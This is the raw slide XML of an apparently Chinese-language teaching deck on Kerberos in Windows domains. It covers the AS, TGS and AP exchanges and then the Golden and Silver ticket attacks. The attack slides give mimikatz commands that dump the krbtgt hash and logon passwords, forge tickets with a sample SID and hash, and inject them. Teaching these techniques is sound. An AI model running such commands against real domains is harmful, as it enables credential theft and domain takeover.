            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="左箭头 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577533" y="3450211"/>
            <a:ext cx="3158573" cy="659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AS-REP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087122" y="4719463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750148" y="4868613"/>
            <a:ext cx="570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KDC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5035" y="2111604"/>
            <a:ext cx="3535052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AS-REQ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我是用户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user007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，这是一段加密数据来证明我的身份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6364" y="4002920"/>
            <a:ext cx="3535052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AS-REP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身份验证成功，给你一张能证明你是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user007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的身份证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(TGT)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以及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Session key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3502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64956" y="282447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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226600" y="1130944"/>
            <a:ext cx="6344239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 TGS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协议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-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利用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TGT(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身份证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换取其它服务票据的协议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877" y="2581717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3731" y="2581717"/>
            <a:ext cx="1883827" cy="2042337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6551035" y="2508149"/>
            <a:ext cx="3346515" cy="678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TGS-REQ</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="左箭头 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577533" y="3450211"/>
            <a:ext cx="3158573" cy="659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TGS-REP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087122" y="4719463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750148" y="4868613"/>
            <a:ext cx="570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KDC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5035" y="2111604"/>
            <a:ext cx="3535052" cy="20313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TGS-REQ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我是用户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user007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我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想申请一张访问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PC1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的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smb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服务的票。这是我的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TGT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，以及一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密数据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来证明我知道与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TGT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对应的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Session key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3081" y="4453351"/>
            <a:ext cx="3535052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TGS-REP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您的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TGT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是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>合法的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，并且加密数据校检成功，这是一张能访问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PC1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的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smb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服务的票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(Service ticket)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以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session key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77760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58" y="2413262"/>
            <a:ext cx="3584759" cy="184786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4675694" y="2875175"/>
            <a:ext cx="1951349" cy="744718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94245" y="2021206"/>
            <a:ext cx="7185750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+mn-ea"/>
              </a:rPr>
              <a:t>KDC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是怎么判断提交上来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是合法的呢？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6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019" y="2487767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9118" y="2230892"/>
            <a:ext cx="1883827" cy="204233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077703" y="4683947"/>
            <a:ext cx="942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35536" y="4507533"/>
            <a:ext cx="570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KDC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4194774" y="2185161"/>
            <a:ext cx="2960016" cy="943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加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TGT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="右箭头 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4251489" y="3338232"/>
            <a:ext cx="2903301" cy="1021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加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317862" y="1108191"/>
            <a:ext cx="5269584" cy="4713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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TGT-REQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>KDC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>申请访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PC1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smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务的票据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165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059" y="2268943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394" y="2317064"/>
            <a:ext cx="1883827" cy="204233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75536" y="4499281"/>
            <a:ext cx="942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409812" y="4683947"/>
            <a:ext cx="570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KDC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左箭头 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7516201" y="2487767"/>
            <a:ext cx="2237193" cy="1281969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krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户密码的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解密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TGT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4608538" y="2292014"/>
            <a:ext cx="2927172" cy="583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加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TGT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661577" y="3381936"/>
            <a:ext cx="2927172" cy="583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加密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Authenticator</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="左箭头 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953133" y="2367820"/>
            <a:ext cx="2546934" cy="1752994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返回访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PC1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务的票以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>session key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420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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg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ONE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19673" y="1941922"/>
            <a:ext cx="77243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域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成员计算机在登录的时候可以选择登录到域中或此计算机，登陆到域中的时候，身份验证是采用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Kerberos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协议在域控制器上进行的，登陆到此计算机则是通过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SAM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来进行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NTLM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验证的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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89714"/>
            <a:ext cx="49398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4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="9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认识域</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="9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629" y="3512450"/>
            <a:ext cx="4462659" cy="27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2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GOLDEN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780907" y="2479249"/>
            <a:ext cx="5505254" cy="246982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只要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>能够被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>KDC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用相关算法解密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户密码的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为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>key)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>合法。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假如我们获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户密码的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，就可以伪造任意用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TGT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2209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174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GOLDEN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18856" y="1670082"/>
            <a:ext cx="116892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mimikatz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34015" y="3289379"/>
            <a:ext cx="60960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privilege::debug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lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>user:krbtgt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7068" y="2584454"/>
            <a:ext cx="3610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导出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>krbtgt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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以及获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sid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015" y="4081806"/>
            <a:ext cx="4943670" cy="260149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8576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078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GOLDEN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37471" y="1586415"/>
            <a:ext cx="116892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mimikatz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670" y="2708600"/>
            <a:ext cx="8803875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mimikatz # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::golden /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user:administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domain:test.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /sid:S-1-5-21-4173655609-916892889-516531421 /krbtgt:4c7f31c8a46406c43c397d5b6223ff27 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ticket:test.kirbi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99580" y="2184559"/>
            <a:ext cx="64500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切换到普通域用户的机器，生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>凭证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用户名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>administrator:</a:t>
            </a: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31" y="3848572"/>
            <a:ext cx="8690752" cy="294080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23730" y="772742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746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GOLDEN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37471" y="1586415"/>
            <a:ext cx="116892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mimikatz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670" y="2708600"/>
            <a:ext cx="880387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mimikatz # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptt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test.kirbi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99580" y="2184559"/>
            <a:ext cx="43043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然后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mimi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将凭证注入进去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攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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160" y="2830890"/>
            <a:ext cx="7654224" cy="384599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23730" y="744656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929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GOLDEN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5305" y="1799848"/>
            <a:ext cx="243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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wmic.vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>登录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70" y="2704846"/>
            <a:ext cx="8649101" cy="397217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23730" y="806503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247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03081" y="374176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WHOAMI </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4110087" y="1083784"/>
            <a:ext cx="5200963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     AP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协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea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将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票据传给目标服务的协议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877" y="2581717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3731" y="2581717"/>
            <a:ext cx="1883827" cy="2042337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6551035" y="2508149"/>
            <a:ext cx="3346515" cy="678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AP-REQ</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="左箭头 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577533" y="3450211"/>
            <a:ext cx="3158573" cy="659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AP-REP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087122" y="4719463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763773" y="4868613"/>
            <a:ext cx="543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PC1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3081" y="1839470"/>
            <a:ext cx="3535052" cy="23083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AP-REQ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客户端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：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我是用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user007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我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想访问你的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smb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服务。这是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一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张能证明我身份的票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(service ticket)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，以及一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密数据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来证明我知道与这张票对应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Session key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3081" y="4453351"/>
            <a:ext cx="3535052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AP-REP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bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>s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mb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服务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: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您的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票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是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>合法的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，并且加密数据校检成功，已确认您是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user007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，可以访问服务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9751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右箭头 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675694" y="2875175"/>
            <a:ext cx="1951349" cy="744718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94245" y="2021206"/>
            <a:ext cx="7253909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+mn-ea"/>
              </a:rPr>
              <a:t>PC1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是怎么判断提交上来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>票</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是合法的呢？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62" y="2583220"/>
            <a:ext cx="3761558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0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54289" y="151028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AP-REQ&amp;AP-REP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019" y="2487767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9118" y="2230892"/>
            <a:ext cx="1883827" cy="204233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077703" y="4683947"/>
            <a:ext cx="942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49161" y="4507533"/>
            <a:ext cx="543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PC1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4194774" y="2185161"/>
            <a:ext cx="2960016" cy="943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加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SERVICE TICKET</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="右箭头 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4251489" y="3338232"/>
            <a:ext cx="2903301" cy="1021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加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317862" y="1282797"/>
            <a:ext cx="5109701" cy="4713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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>AP-REQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>申请访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PC1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smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务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928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059" y="2268943"/>
            <a:ext cx="1505843" cy="18716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5263" y="2360767"/>
            <a:ext cx="1883827" cy="204233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75536" y="4499281"/>
            <a:ext cx="942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user007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423437" y="4683947"/>
            <a:ext cx="543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PC1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左箭头 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7516201" y="2292015"/>
            <a:ext cx="2456023" cy="1477722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用启动服务用户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解密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SERVICE TICKET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4608538" y="2292014"/>
            <a:ext cx="2927172" cy="583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加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SERVICE TICKET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661577" y="3381936"/>
            <a:ext cx="2927172" cy="583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加密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Authenticator</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="左箭头 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953133" y="2367820"/>
            <a:ext cx="2546934" cy="1752994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认证成功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154289" y="151028"/>
            <a:ext cx="503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AP-REQ&amp;AP-REP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355303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SILVER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780907" y="2479249"/>
            <a:ext cx="5505254" cy="246982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只要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SERVICE TICKET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>能够被服务器用相关算法解密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以服务用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>密码的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为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>key)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SERVICE TICKET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>合法。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假如我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取服务用户密码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，就可以伪造访问该服务的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SERVICE TICKET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2209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898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89714"/>
            <a:ext cx="49398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认识域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618114" y="1828801"/>
            <a:ext cx="787467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活动目录（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Active Directory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</a:t>
            </a:r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：活动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目录是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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WindowsServer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在网络环境中提供的“资源目录”。活动目录是储存着域中相关资源信息的目录，例如计算机，用户组，数据库，服务器，打印机，用户属性（权限等），就像一个数据库</a:t>
            </a:r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dirty="0" smtClean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/>
            </a:r>
            <a:b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域控（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Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Controller</a:t>
            </a:r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），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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DC</a:t>
            </a:r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：安装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了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的服务器就是域控制器，即有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的计算机就是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DC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84359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SILVER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92249" y="1508713"/>
            <a:ext cx="116892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mimikatz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18856" y="2404101"/>
            <a:ext cx="27943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登录域控，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>机器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash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92249" y="3035862"/>
            <a:ext cx="60960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privilege::debug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sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logonpasswords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49" y="3908399"/>
            <a:ext cx="9060965" cy="2789162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01969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457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SILVER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92249" y="1508713"/>
            <a:ext cx="116892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mimikatz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18856" y="2404101"/>
            <a:ext cx="5171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hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>保存下来，在普通域用户机器中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行攻击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92249" y="3013012"/>
            <a:ext cx="9356676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kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::golden /</a:t>
